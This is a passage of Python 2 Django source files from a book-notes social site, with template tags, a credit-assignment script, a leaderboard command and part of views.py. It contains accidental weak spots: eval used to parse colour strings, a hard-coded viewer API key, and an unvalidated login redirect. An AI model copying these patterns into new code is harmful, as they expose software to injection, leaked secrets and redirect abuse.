Node.objects.filter(parent=node).order_by('order')\n return C(context, {'depth': depth + 1, 'node': node, 'subnodes': subnodes})\n\[email protected]_tag('ui/paginator_widget.html', takes_context=True)\ndef paginator(context, items, paging_url):\n previous_link = paging_url.replace('<PAGENO>',\n str(items.previous_page_number()))\n\n next_link = paging_url.replace('<PAGENO>',\n str(items.next_page_number()))\n\n return C(context, {'items': items, 'previous_link': previous_link,\n 'next_link': next_link})\n\[email protected]_tag('ui/preview_widget.html', takes_context=True)\ndef preview_attachment(context, url):\n if url.lower().endswith('xlsx') or url.lower().endswith('doc') or \\\n url.lower().endswith('docx') or url.lower().endswith('pdf'):\n url = ' http://viewer.docspad.com/index.php?doc=%s&key=US3Lx8KlveTOzgYS' %url\n else:\n url = ''\n\n return C(context, {'url':url})\n\[email protected]_tag('ui/cart_widget.html', takes_context=True)\ndef cart(context):\n req = context['request']\n user = context['user']\n if user.is_anonymous():\n return ''\n \n show_checkout_link = not req.get_full_path().startswith('/cart/checkout/')\n \n cart_data = req.session.setdefault('cart', [])\n cart = []\n total_credits = Decimal('0.0')\n\n for item, num in cart_data:\n item = RedeemableItem.objects.get(id=int(item))\n item.opts = range(1, item.num + 1)\n cart.append((item, num))\n item_credits = item.credits * num\n item.item_credits = item_credits\n total_credits += item_credits\n\n total_credits = total_credits + HANDLING_CREDITS\n \n available_credits = user.get_profile().credits - total_credits\n sufficient_credits = (available_credits >= 0)\n\n data = {\n 'cart': cart,\n 'total_credits': total_credits,\n 'available_credits': available_credits.copy_abs(),\n 'handling_credits': HANDLING_CREDITS,\n 'sufficient_credits': sufficient_credits,\n 'checkout_link': show_checkout_link,\n }\n return C(context, data)\n\[email protected]_tag('ui/markitup_editor.html', takes_context=True)\ndef markup(context, widget_id, target):\n return C(context, {'widget_id': widget_id, 'target': target})\n\[email protected]_tag('ui/attachments_widget.html', takes_context=True)\ndef attachments(context, target, num):\n user = context['user']\n can_add = target.is_editable_by(user)\n return C(context, {'target': target, 'num': num, 'can_add': can_add})\n\ndef render(parser, token):\n contents = token.split_contents()\n tag_name = contents.pop(0)\n \n if len(contents) < 1:\n raise template.TemplateSyntaxError, \"%r tag requires atleast one argument\" % tag_name\n\n return RenderObj(contents)\n\nclass RenderObj(template.Node):\n def __init__(self, contents):\n self.contents = contents\n\n def render(self, context):\n resolved_contents = []\n \n for c in self.contents:\n resolved_contents.append(template.Variable(c).resolve(context))\n \n obj = resolved_contents.pop(0)\n if obj is None:\n return ''\n \n return obj.render(context, *resolved_contents)\n\nregister.tag('render', render)\n\ndef button(parser, token):\n args = token.split_contents()\n tag_name = args.pop(0)\n \n if len(args) < 1:\n raise template.TemplateSyntaxError, \"%r tag atleast one argument\" % tag_name\n\n link = args.pop(0)[1:-1]\n kwargs = dict([a.strip('\\'').split('=', 1) for a in args])\n\n nodelist = parser.parse(('endbutton',))\n parser.delete_first_token()\n\n return Button(nodelist, link, kwargs)\n\nclass Button(template.Node):\n DEFAULTS = {\n 'title': 'Click Here',\n 'color': '7E9BDE',\n 'hcolor': 'DEDEDE',\n 'borderwidth': '1px',\n }\n\n def 
_ensure_range(self, val, min, max):\n if val < min: return min\n if val > max: return max\n return val\n\n def _get_text_color(self, color):\n rgb = self._htmlcolor_to_rgb(color)\n rgb = self._norm_rgb(rgb)\n h, s, v = colorsys.rgb_to_hsv(*rgb)\n\n text_v = .9 if v < .7 else .1\n text_v = self._ensure_range(text_v, 0, 1)\n \n rgb = colorsys.hsv_to_rgb(h, 0.2, text_v)\n rgb = self._denorm_rgb(rgb)\n return self._rgb_to_htmlcolor(rgb)\n\n def _norm_rgb(self, rgb):\n r, g, b = rgb\n r = r / 255.\n g = g / 255.\n b = b / 255.\n return r, g, b\n\n def _denorm_rgb(self, rgb):\n r, g, b = rgb\n r = r * 255\n g = g * 255\n b = b * 255\n return r, g, b\n\n def _get_lighter_color(self, htmlcolor, percent=.1):\n rgb = self._htmlcolor_to_rgb(htmlcolor)\n rgb = self._norm_rgb(rgb)\n h, s, v = colorsys.rgb_to_hsv(*rgb)\n v = v + v * percent\n rgb = colorsys.hsv_to_rgb(h, s, v)\n rgb = self._denorm_rgb(rgb)\n return self._rgb_to_htmlcolor(rgb)\n\n def _get_darker_color(self, htmlcolor, percent=.1):\n rgb = self._htmlcolor_to_rgb(htmlcolor)\n rgb = self._norm_rgb(rgb)\n h, s, v = colorsys.rgb_to_hsv(*rgb)\n v = v - v * percent\n rgb = colorsys.hsv_to_rgb(h, s, v)\n rgb = self._denorm_rgb(rgb)\n return self._rgb_to_htmlcolor(rgb)\n\n def _rgb_to_htmlcolor(self, rgb):\n r, g, b = [int(self._ensure_range(v, 0, 255)) for v in rgb]\n return '%s%s%s' % (hex(r)[2:], hex(g)[2:], hex(b)[2:])\n\n def _htmlcolor_to_rgb(self, htmlcolor):\n h = htmlcolor.strip(' #')\n r, g, b = h[:2], h[2:4], h[4:6]\n r = eval('0x' + r)\n g = eval('0x' + g)\n b = eval('0x' + b)\n return r, g, b\n\n def __init__(self, nodelist, link, kwargs):\n self.nodelist = nodelist\n self.link = link\n self.kwargs = kwargs\n\n def render(self, context):\n t = template.loader.get_template('ui/button_widget.html')\n\n button_text = self.nodelist.render(context)\n button_class = 'btncl_' + hashlib.md5(self.link).hexdigest()\n\n for k, v in self.kwargs.iteritems():\n self.kwargs[k] = template.Template(v).render(context)\n\n c = make_context(context)\n c['link'] = template.Template(self.link).render(context)\n c['buttontext'] = button_text\n c['button_class'] = button_class\n\n k = dict(self.kwargs)\n D = self.DEFAULTS\n\n k['title'] = k.get('title') or D['title']\n k['color'] = k.get('color') or D['color']\n k['hcolor'] = k.get('hcolor') or D['hcolor']\n k['borderwidth'] = k.get('borderwidth') or D['borderwidth']\n\n k['tcolor'] = k.get('tcolor') or self._get_text_color(k['color'])\n k['htcolor'] = k.get('htcolor') or self._get_text_color(k['hcolor'])\n \n k['blight'] = k.get('blight') or self._get_lighter_color(k['color'], .3)\n k['bdark'] = k.get('bdark') or self._get_darker_color(k['color'], .3)\n \n k['hblight'] = k.get('hblight') or self._get_lighter_color(k['hcolor'], .3)\n k['hbdark'] = k.get('hbdark') or self._get_darker_color(k['hcolor'], .3)\n\n kwargs = k\n\n for k, v in kwargs.iteritems():\n c[k] = v\n\n c = C(context, c)\n\n return t.render(c)\n\nregister.tag('button', button)\n\ndef thumbnail(obj, size='104x104'):\n\n square = False\n arg_size = size\n if size.startswith('S'):\n square = True\n size = size[1:]\n crop = True\n\n if isinstance(obj, AssociatedMedia):\n image = obj.media\n\n if not image.file:\n try:\n content = get_doc(image.url, settings.CACHE_DIR)\n except:\n obj.delete()\n return thumbnail(NO_IMAGE , size)\n\n content_file = ContentFile(content)\n fname = hashlib.md5(image.url).hexdigest() + '.' 
+ image.url.rsplit('.', 1)[-1]\n image.file.save(fname, content_file, save=True)\n\n file = image.file\n path = file.path\n url = file.url\n\n elif isinstance(obj, FieldFile):\n file = obj\n path = file.path\n url = file.url\n\n elif isinstance(obj, (str, unicode)):\n file_path = obj\n file_path = file_path.split('static', 1)[-1]\n path = settings.MEDIA_ROOT + file_path\n url = settings.MEDIA_URL + file_path\n else:\n return thumbnail(NO_IMAGE , size)\n\n # defining the size\n dimensions = [int(x) if x.isdigit() else None for x in size.lower().split('x')]\n\n # defining the filename and the miniature filename\n filehead, filetail = os.path.split(path)\n basename, format = os.path.splitext(filetail)\n miniature = basename + '_' + size + format\n filename = path\n miniature_filename = os.path.join(filehead, miniature)\n filehead, filetail = os.path.split(url)\n miniature_url = filehead + '/' + miniature\n\n if os.path.exists(miniature_filename) and os.path.getmtime(filename) > os.path.getmtime(miniature_filename):\n os.unlink(miniature_filename)\n\n # if the image wasn't already resized, resize it\n if not os.path.exists(miniature_filename):\n \n try:\n image = PIL.open(filename)\n except IOError:\n if isinstance(obj, AssociatedMedia):\n obj.delete()\n return thumbnail(NO_IMAGE , size)\n\n format = image.format\n\n if image.mode != 'RGBA' and format != 'BMP':\n image = image.convert('RGBA')\n \n if square:\n width, height = image.size\n side = min(width, height)\n x = (width - side) / 2\n y = (height - side) / 2\n image = image.crop((x, y, x+side, y+side))\n\n try:\n image.thumbnail(dimensions, PIL.ANTIALIAS)\n image.save(miniature_filename, format, quality=90)\n except:\n return thumbnail('/static/images/user.png', arg_size)\n\n return miniature_url\n \nregister.filter(thumbnail)\n"
},
{
"alpha_fraction": 0.598954439163208,
"alphanum_fraction": 0.607169508934021,
"avg_line_length": 25.780000686645508,
"blob_id": "60dbbbd94c0dca92c1f6639319d4f4e056e5b0dd",
"content_id": "dea2915e917b6a3285916255d070ac784f99a467",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1339,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 50,
"path": "/www/scripts/assign_credits.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport sys\nfrom decimal import Decimal\n\nfrom django.db.models import Sum, Q\n\nfrom core.models import *\nimport notification.models as notification\n\nIGNORE_USERS = User.objects.filter(Q(is_staff=True) | Q(is_superuser=True))\n\ndef ignore_points():\n points = 0\n\n for u in IGNORE_USERS:\n points += u.get_profile().points\n\n return points\n\ndef main(credits, mock=True):\n\n credits_assigned = 0.0\n total_points = UserProfile.objects.all().aggregate(Sum('points'))\n total_points = total_points['points__sum']\n total_points -= ignore_points()\n\n for u in UserProfile.objects.all():\n \n if u.user in IGNORE_USERS:\n continue\n\n if u.points <= 1:\n continue\n\n user_credits = (u.points / float(total_points)) * credits\n if not mock:\n cur_credits = Decimal(str(user_credits))\n u.credits += cur_credits\n u.save()\n notification.send([u.user], 'credits_earned',\n {'user': u.user, 'credits': '%.2f' % cur_credits})\n\n print '%20s\\t%.2f' % (u.user.username, user_credits)\n credits_assigned += user_credits\n\n print 'Credits assigned: %.2f' % credits_assigned\n print 'Credits Leftover: %.2f' % (credits - credits_assigned)\n\nif __name__ == '__main__':\n main(int(sys.argv[1]))\n"
},
{
"alpha_fraction": 0.5872156023979187,
"alphanum_fraction": 0.5937161445617676,
"avg_line_length": 28.774192810058594,
"blob_id": "7cfaf298b42c3ad513d709584554844a20a40f27",
"content_id": "af299d2411e66c31ad0b49c570bd3679805ba4ec",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 923,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 31,
"path": "/www/core/management/commands/update_leaderboarddata.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "import datetime\nfrom itertools import groupby\n\nfrom django.core.management.base import BaseCommand\n\nfrom core.models import *\n\nclass Command(BaseCommand):\n help = \"Load data into leaderboard table\"\n args = ''\n\n def handle(self, *args, **options):\n\n ratings = Ratings.objects.order_by('-date_added')[:10000]\n users = [(r.user.id, r.user) for r in ratings]\n users.sort()\n users = [u for _id, u in users]\n users = [list(g) for key, g in groupby(users, lambda u: u.id)]\n users = [(len(g), g) for g in users]\n users.sort()\n users.reverse()\n users = [u[0] for count, u in users]\n\n LeaderBoardData.objects.all().delete()\n for u in users:\n LeaderBoardData.objects.create(tag='active',\n target_type=u.get_profile().ctype,\n target_id=u.get_profile().id)\n\n def usage(self, subcommand):\n return ''\n"
},
{
"alpha_fraction": 0.5587482452392578,
"alphanum_fraction": 0.5604161024093628,
"avg_line_length": 34.278663635253906,
"blob_id": "198e1ccc86a85d7c6c2d880cd08fa81b317f8ec4",
"content_id": "397ee3e71fce8149218f45ba8ff029cc8953b3c3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 68351,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 1884,
"path": "/www/core/views.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "from __future__ import with_statement\r\nimport os\r\nimport re\r\nimport datetime\r\nfrom cStringIO import StringIO\r\nfrom itertools import chain\r\nimport hashlib\r\n\r\nimport Image as PIL\r\nimport simplejson as json\r\n\r\nfrom django.core.urlresolvers import reverse\r\nfrom django import template\r\nfrom django.template import Context\r\nfrom django.shortcuts import render_to_response\r\nfrom django.http import HttpResponse, HttpResponseRedirect, HttpResponseServerError\r\nfrom django.contrib.contenttypes.models import ContentType\r\nfrom django.template import RequestContext\r\nfrom django.core.exceptions import ObjectDoesNotExist\r\nfrom django.contrib.auth import authenticate, login, logout\r\nfrom django.contrib.auth.decorators import login_required\r\n#from pure_pagination import Paginator, InvalidPage, EmptyPage\r\n#from flynsarmy_paginator.paginator import FlynsarmyPaginator\r\nfrom django.core.paginator import Paginator, InvalidPage, EmptyPage\r\nfrom django.core.files.base import ContentFile\r\nfrom django.db import IntegrityError, connection\r\nfrom django.db.models.query import QuerySet\r\nfrom django.db.models import Q\r\nfrom django.conf import settings\r\nfrom django.core.files.uploadhandler import TemporaryFileUploadHandler\r\n\r\n\r\nfrom reversion import revision\r\nfrom reversion.models import Version\r\nimport notification.models as notification\r\nfrom notification.models import NoticeSetting, NoticeType\r\nimport facebook.djangofb as facebook\r\nfrom django.core.mail import send_mail\r\n\r\nfrom models import *\r\nfrom utils import get_doc, xcode, sanitize_whitespace, urlsafe, get_md5\r\nfrom utils import get_target, get_target_from_req, QuerySetFilter, QuerySetMerge\r\nfrom forms import LoginForm, UserProfileForm, FeedbackForm, InviteForm\r\nfrom forms import AddBookForm, EditBookForm, MailingAddressForm\r\nfrom forms import make_notifications_form, EmailForm\r\nfrom query import load_videos, get_items_by_tag, get_top_users\r\nfrom points import give_points\r\n\r\nITEMS_PER_PAGE = 10\r\nWALL_ITEMS_PER_PAGE = 25\r\nREVISIONS_PER_PAGE = 10\r\nPOINT_HISTORY_PER_PAGE = 10\r\nDEFAULT_PAGE_TITLE = 'Notemonk - A brand new way to experience your books.'\r\nPTITLE = '%s - Notemonk'\r\n\r\ndef render_response(req, template, data=None):\r\n data = data or {}\r\n r = RequestContext(req)\r\n\r\n data['ref_path'] = req.get_full_path()\r\n if 'page_title' not in data:\r\n data['page_title'] = DEFAULT_PAGE_TITLE\r\n\r\n return render_to_response(template, data, context_instance=r)\r\n\r\ndef render_error(request, message):\r\n return render_response(request, 'ui/base.html',\r\n {'error': message})\r\n\r\ndef custom_login_required(fn):\r\n def login_req(request, *args, **kwargs):\r\n next = request.POST['ref_path'] if 'ref_path' in request.POST \\\r\n else ''\r\n if not next:\r\n next = request.get_full_path()\r\n\r\n if not request.user.is_authenticated():\r\n return HttpResponseRedirect('/login/?next=%s' % next)\r\n\r\n if not request.user.email:\r\n return HttpResponseRedirect('/email/?next=%s' % next)\r\n\r\n return fn(request, *args, **kwargs)\r\n return login_req\r\n\r\ndef ensure_no_mem_file(fn):\r\n def wrapper(request, *args, **kwargs):\r\n request.upload_handlers = [TemporaryFileUploadHandler()]\r\n return fn(request, *args, **kwargs)\r\n return wrapper\r\n\r\ndef ncert_view(request):\r\n page_title = PTITLE % 'Download NCERT Books'\r\n return render_response(request, 'ui/groups/ncert.html', {\r\n 'page_title': page_title})\r\n\r\ndef 
tamilnadu_view(request):\r\n page_title = PTITLE % 'Download Tamilnadu Books'\r\n return render_response(request, 'ui/groups/tamilnadu.html', {\r\n 'page_title': page_title})\r\n\r\ndef bits_view(request):\r\n page_title = PTITLE % 'Download BITS MSSS Books'\r\n return render_response(request, 'ui/groups/bits_msss.html', {\r\n 'page_title': page_title})\r\ndef anu_view(request):\r\n page_title = PTITLE % 'Download Acharya Nagarjuna University (ANU) Books'\r\n return render_response(request, 'ui/groups/anu_books.html', {\r\n 'page_title': page_title})\r\n\r\ndef ipe_view(request):\r\n page_title = PTITLE % 'Download Andhra Pradesh Intermediate Books'\r\n return render_response(request, 'ui/groups/ipe_books.html', {\r\n 'page_title': page_title})\r\ndef cbse_view(request):\r\n page_title = PTITLE % 'Download CBSE Books'\r\n return render_response(request, 'ui/groups/cbse_books.html', {\r\n 'page_title': page_title})\r\n\r\ndef aieee_view(request):\r\n page_title = PTITLE % 'Download AIEEE Books'\r\n return render_response(request, 'ui/groups/aieee_books.html', {\r\n 'page_title': page_title})\r\ndef iitjee_view(request):\r\n page_title = PTITLE % 'Download IITJEE Books'\r\n return render_response(request, 'ui/groups/iitjee_books.html', {\r\n 'page_title': page_title})\r\ndef upsc_view(request):\r\n page_title = PTITLE % 'Download UPSC Books'\r\n return render_response(request, 'ui/groups/upsc_books.html', {\r\n 'page_title': page_title})\r\ndef privacy_policy_view(request):\r\n page_title = \"Privacy Policy\"\r\n return render_response(request, 'ui/privacy_policy.html', {\r\n 'page_title': page_title})\r\n\r\n# background ad [ bad.html ]\r\ndef bad_view(request):\r\n page_title = PTITLE % 'Background ad'\r\n return render_response(request, 'ui/bad.html', {\r\n 'page_title': page_title})\r\n\r\n\r\ndef get_followers(*objects):\r\n objects = [get_root(o) for o in objects]\r\n objects = [o for o in objects if o]\r\n followers = set(chain(*[[f.user for f in o.followers.all()] for o in objects]))\r\n\r\n superusers_notify = getattr(settings, 'SUPERUSERS_NOTIFY', False)\r\n if superusers_notify:\r\n superusers = User.objects.filter(is_superuser=True)\r\n followers.update(superusers)\r\n\r\n return list(followers)\r\n\r\ndef get_root(object):\r\n target = object\r\n\r\n while target:\r\n if hasattr(target, 'follow'):\r\n return target\r\n\r\n target = getattr(target, 'target', None)\r\n\r\ndef follow_root(target, user):\r\n root = get_root(target)\r\n if root:\r\n return root.follow(user)\r\n\r\ndef add_to_book_stream(target, activity):\r\n root = get_root(target)\r\n return root.stream.add(activity) if root and isinstance(root, Book) else None\r\n\r\ndef make_paginator(queryset, page_no, num):\r\n page_no = page_no or 1\r\n num = num or ITEMS_PER_PAGE\r\n paginator = Paginator(queryset, int(num))\r\n try:\r\n paginator = paginator.page(int(page_no))\r\n except (EmptyPage, InvalidPage):\r\n paginator = paginator.page(paginator.num_pages)\r\n\r\n return paginator\r\n\r\ndef login_view(request):\r\n top_users = get_top_users()\r\n\r\n next = ''\r\n if request.method == 'POST':\r\n form = LoginForm(request.POST)\r\n if form.is_valid():\r\n next = request.POST['ref_path'] if 'ref_path' in request.POST \\\r\n else ''\r\n\r\n username = form.cleaned_data['username']\r\n password = form.cleaned_data['password']\r\n persistent = form.cleaned_data['persistent']\r\n\r\n if not persistent:\r\n request.session.set_expiry(0)\r\n\r\n user = authenticate(username=username, password=password)\r\n if user:\r\n if 
user.is_active:\r\n login(request, user)\r\n else:\r\n return render_response(request, 'ui/login.html', {\r\n 'next': next,\r\n 'form': form,\r\n 'top_users': top_users,\r\n 'avoid': True,\r\n 'error': \"Your account is de-activated\"\r\n })\r\n\r\n else:\r\n return render_response(request, 'ui/login.html', {\r\n 'next': next,\r\n 'form': form,\r\n 'top_users': top_users,\r\n 'avoid': True,\r\n 'error': \"Your Username or Password was incorrect\"\r\n })\r\n\r\n return HttpResponseRedirect(next or reverse('home_page'))\r\n else:\r\n if request.user.is_authenticated():\r\n return HttpResponseRedirect(reverse('home_page'))\r\n\r\n next = request.GET['next'] if 'next' in request.GET else ''\r\n form = LoginForm()\r\n\r\n return render_response(request, 'ui/login.html', {\r\n 'next': next,\r\n 'form': form,\r\n 'top_users': top_users,\r\n 'avoid': True,\r\n 'page_title': PTITLE % 'Login'\r\n })\r\n\r\ndef logout_user(request):\r\n logout(request)\r\n return HttpResponseRedirect(reverse('home_page'))\r\n\r\n@login_required\r\ndef email_view(request):\r\n next = ''\r\n email = ''\r\n error = ''\r\n\r\n top_users = get_top_users()\r\n\r\n if request.method == 'POST':\r\n form = EmailForm(request.POST)\r\n next = request.POST['ref_path']\r\n\r\n if form.is_valid():\r\n email = form.cleaned_data['email']\r\n re_enter_email = form.cleaned_data['re_enter_email']\r\n if email != re_enter_email:\r\n error = 'Please re-enter email correctly'\r\n return render_response(request, 'ui/email.html',\r\n {'form': form,\r\n 'next': next,\r\n 'top_users': top_users,\r\n 'error': error,\r\n 'page_title': PTITLE % 'Email'})\r\n\r\n request.user.email = email\r\n request.user.save()\r\n\r\n return HttpResponseRedirect(next or reverse('home_page'))\r\n else:\r\n form = EmailForm()\r\n next = request.GET['next'] if 'next' in request.GET else ''\r\n\r\n error = 'Hi Facebook user, please enter your email-id below.'\r\n\r\n return render_response(request, 'ui/email.html',\r\n {'form': form,\r\n 'next': next,\r\n 'top_users': top_users,\r\n 'error': error,\r\n 'page_title': PTITLE % 'Email'})\r\n\r\ndef _filter_stream(filter, user):\r\n filter_str = '' if filter == 'activities' else filter + '/'\r\n paging_url = '/user/%s/%s<PAGENO>/' % (user.username, filter_str)\r\n use_target = False\r\n as_wall = False\r\n\r\n page_title = PTITLE % ('%s of %s' % (filter.capitalize(), user.get_profile().title))\r\n\r\n if filter == 'notes':\r\n stream = Note.objects.filter(user=user)\r\n elif filter == 'videos':\r\n stream = AssociatedMedia.objects.filter(user=user)\r\n as_wall = True\r\n elif filter == 'questions':\r\n stream = user.get_profile().questions\r\n elif filter == 'answers':\r\n stream = user.get_profile().answers\r\n elif filter == 'books':\r\n stream = user.get_profile().books\r\n as_wall = True\r\n elif filter == 'fbooks':\r\n stream = user.get_profile().following_books\r\n as_wall = True\r\n elif filter == 'followers':\r\n stream = user.get_profile().followers.all()\r\n stream = QuerySetFilter(stream, lambda x: x.user.get_profile())\r\n as_wall = True\r\n elif filter == 'following':\r\n stream = user.get_profile().following\r\n as_wall = True\r\n elif filter == 'referred':\r\n stream = user.get_profile().referred\r\n as_wall = True\r\n elif filter == 'comments':\r\n stream = user.get_profile().comments\r\n elif filter == 'points':\r\n stream = user.get_profile().points_history\r\n\r\n return stream, paging_url, use_target, as_wall, page_title\r\n\r\ndef user_items_view(request, username=None, page_no=1, num=None, 
filter=None):\r\n\r\n try:\r\n username = username or request.user.username\r\n page_user = User.objects.get(username=username)\r\n except User.DoesNotExist:\r\n return render_response(request, 'ui/base.html', {'error': 'User not known'})\r\n\r\n stream, paging_url, use_target, as_wall, page_title = _filter_stream(filter, page_user)\r\n stream = make_paginator(stream, page_no, num)\r\n\r\n num = WALL_ITEMS_PER_PAGE if as_wall else ITEMS_PER_PAGE\r\n template = 'ui/user_wall.html' if as_wall else 'ui/user_items.html'\r\n\r\n return render_response(request, template,\r\n {'page_user': page_user,\r\n 'page_title': page_title,\r\n 'stream': stream,\r\n 'paging_url': paging_url,\r\n 'use_target': use_target})\r\n\r\ndef _get_activity_stream(request, page_user, a_id):\r\n\r\n book_streams = []\r\n\r\n if page_user == request.user:\r\n users = [page_user] + [x.user for x in page_user.get_profile().following]\r\n\r\n # dont show Notemonk's activities to followers (too many items)\r\n if page_user.id != 1:\r\n users = [u for u in users if u.id != 1]\r\n\r\n stream = Activity.objects.filter(user__in=users)\r\n\r\n for b in page_user.get_profile().following_books:\r\n bstream = StreamItem.objects.filter(stream=b.stream).order_by('-id')\r\n\r\n if a_id is not None:\r\n bstream = bstream.filter(activity__lte=a_id)\r\n\r\n bstream = QuerySetFilter(bstream, lambda x: x.activity)\r\n book_streams.append(bstream)\r\n\r\n else:\r\n stream = Activity.objects.filter(user=page_user)\r\n\r\n # activities associated with user\r\n user_stream = page_user.get_profile().stream\r\n user_stream = StreamItem.objects.filter(stream=user_stream)\r\n\r\n if a_id is not None:\r\n stream = stream.filter(id__lte=a_id)\r\n user_stream = user_stream.filter(activity__lte=a_id)\r\n\r\n user_stream = QuerySetFilter(user_stream, lambda x: x.activity)\r\n streams = [stream, user_stream]\r\n streams.extend(book_streams)\r\n\r\n stream = QuerySetMerge(streams, '-id')\r\n\r\n return stream\r\n\r\ndef _find_slot(slots, activity):\r\n MAX_ITEMS_PER_SLOT = 8\r\n MAX_TIMEDIFF = 3600 #seconds or 1 hour\r\n\r\n dt = activity.date_added\r\n target = activity.target\r\n\r\n for index, s in enumerate(reversed(slots)):\r\n s_target = s['target']\r\n s_dt = s['dt']\r\n s_items = s['items']\r\n\r\n if len(s_items) >= MAX_ITEMS_PER_SLOT and\\\r\n not isinstance(target, Comment):\r\n continue\r\n\r\n if index != 0:\r\n tdiff = max(dt, s_dt) - min(dt, s_dt)\r\n tdiff = tdiff.seconds\r\n if tdiff > MAX_TIMEDIFF:\r\n continue\r\n\r\n if isinstance(target, PointsHistory):\r\n if isinstance(s_target, PointsHistory):\r\n return s\r\n\r\n elif isinstance(target, Ratings):\r\n if isinstance(s_target, Ratings):\r\n return s\r\n\r\n elif isinstance(target, Comment):\r\n ctarget = target.target\r\n if ctarget == s_target:\r\n return s\r\n\r\n elif isinstance(target, ProfilePost):\r\n if target == s_target:\r\n return s\r\n\r\n # slot not found for comment, so create slot\r\n if isinstance(target, Comment):\r\n slots.append({'target': target.target, 'dt': activity.date_added, 'items': []})\r\n return slots[-1]\r\n\r\ndef _make_stream_from_slots(slots):\r\n stream = []\r\n\r\n for s in slots:\r\n items = s['items']\r\n if len(items) == 1:\r\n stream.append(items[0])\r\n\r\n else:\r\n stream.append(ItemGroup(items))\r\n\r\n return stream\r\n\r\ndef _digest_activity_stream(stream, num_items=ITEMS_PER_PAGE):\r\n\r\n next_id = None\r\n slots = []\r\n\r\n activities_seen = set()\r\n\r\n counter = 0\r\n for a in stream[:100]:\r\n if a.id in activities_seen:\r\n 
continue\r\n activities_seen.add(a.id)\r\n\r\n counter += 1\r\n next_id = a.id - 1\r\n\r\n slot = _find_slot(slots, a)\r\n if slot:\r\n if slot['target'] != a.target:\r\n slot['items'].append(a)\r\n else:\r\n slot = {'target': a.target,\r\n 'dt': a.date_added,\r\n 'items': [a]}\r\n slots.append(slot)\r\n\r\n if len(slots) >= num_items:\r\n break\r\n\r\n stream = _make_stream_from_slots(slots)\r\n\r\n return stream, next_id\r\n\r\ndef user_view(request, username=None, a_id=None):\r\n\r\n try:\r\n username = username or request.user.username\r\n page_user = User.objects.get(username=username)\r\n except User.DoesNotExist:\r\n return render_response(request, 'ui/base.html', {'error': 'User not known'})\r\n\r\n stream = _get_activity_stream(request, page_user, a_id)\r\n stream, next_id = _digest_activity_stream(stream)\r\n\r\n if a_id is None:\r\n page_title = PTITLE % ('%s' % page_user.get_profile().title)\r\n else:\r\n page_title = PTITLE % ('Activities of %s' % page_user.get_profile().title)\r\n\r\n return render_response(request, 'ui/user_activities.html',\r\n {'page_user': page_user,\r\n 'page_title': page_title,\r\n 'stream': stream,\r\n 'next_id': next_id})\r\n\r\ndef activities_view(request, a_id=None):\r\n\r\n stream = Activity.objects.all()\r\n stream = stream.filter(id__lte=a_id) if a_id is not None else stream\r\n stream = stream.order_by('-id')\r\n stream, next_id = _digest_activity_stream(stream)\r\n\r\n page_title = PTITLE % 'Activities of Notemonkers'\r\n\r\n return render_response(request, 'ui/activities.html',\r\n {'page_title': page_title,\r\n 'stream': stream,\r\n 'next_id': next_id})\r\n\r\nclass PermissionException(Exception):\r\n pass\r\n\r\n@login_required\r\ndef user_edit_view(request):\r\n\r\n error = ''\r\n\r\n try:\r\n page_user = User.objects.get(username=request.user.username)\r\n profile = page_user.get_profile()\r\n\r\n mapping = (\r\n ('first_name', page_user),\r\n ('last_name', page_user),\r\n ('email', page_user),\r\n ('institution', profile),\r\n ('city', profile),\r\n ('state', profile),\r\n ('country', profile),\r\n ('mailing_address', profile),\r\n ('dob', profile),\r\n ('sex', profile),\r\n )\r\n\r\n except User.DoesNotExist:\r\n error = 'User not found'\r\n\r\n if request.method == 'POST':\r\n form = UserProfileForm(request.POST, request.FILES)\r\n nform = make_notifications_form(request.POST)\r\n\r\n if form.is_valid():\r\n\r\n for field, target in mapping:\r\n setattr(target, field, form.cleaned_data[field])\r\n\r\n password = form.cleaned_data['password1']\r\n\r\n if password:\r\n page_user.set_password(password)\r\n\r\n image = request.FILES.get('image')\r\n if image:\r\n cfile = ContentFile(image.read())\r\n profile.image.save(image.name, cfile, save=True)\r\n\r\n page_user.save()\r\n profile.save()\r\n\r\n # notification form processing\r\n for n in NoticeType.objects.all():\r\n\r\n if n.label.startswith('_'):\r\n continue\r\n\r\n value = bool(request.POST[n.label] if n.label in request.POST \\\r\n else False)\r\n\r\n try:\r\n ns = NoticeSetting.objects.create(user=page_user,\r\n notice_type=n, medium='1',\r\n send=value)\r\n except IntegrityError:\r\n ns = NoticeSetting.objects.get(user=page_user,\r\n notice_type=n, medium='1')\r\n ns.send = value\r\n ns.save()\r\n\r\n followers = get_followers(profile)\r\n notification.send(followers, 'profile_changed', {'user': page_user})\r\n\r\n return HttpResponseRedirect(reverse('user_page',\r\n kwargs={'username': page_user.username}))\r\n else:\r\n data = dict([(field, getattr(source, field)) for field, 
source in mapping])\r\n form = UserProfileForm(data)\r\n\r\n data = {}\r\n for n in NoticeType.objects.all():\r\n try:\r\n ns = NoticeSetting.objects.get(user=page_user,\r\n notice_type=n, medium='1')\r\n value = ns.send\r\n except ObjectDoesNotExist:\r\n value = True\r\n\r\n data[n.label] = value\r\n\r\n nform = make_notifications_form(data)\r\n\r\n return render_response(request, 'ui/user_edit.html',\r\n {'page_user': page_user,\r\n 'error': error,\r\n 'form': form,\r\n 'nform': nform,\r\n 'page_title': PTITLE % ('%s - Edit' % page_user.get_profile().title)})\r\n\r\ndef home_view(request):\r\n #new_notes = Note.objects.order_by('-date_added').\\\r\n # exclude(target_type=\\\r\n # ContentType.objects.get_for_model(UserProfile))\r\n\r\n popular_books = Book.objects.order_by('-tot_count')[:5]\r\n\r\n new_videos = AssociatedMedia.objects.filter(media_type=\\\r\n ContentType.objects.get_for_model(Video)).order_by('-id')[:10]\r\n\r\n #new_questions = Question.objects.order_by('-date_added')\r\n\r\n #active_users = LeaderBoardData.objects.filter(tag='active',\\\r\n # target_type=ContentType.objects.get_for_model(UserProfile))\r\n\r\n top_users = get_top_users()\r\n\r\n #active_topics = LeaderBoardData.objects.filter(tag='active',\\\r\n # 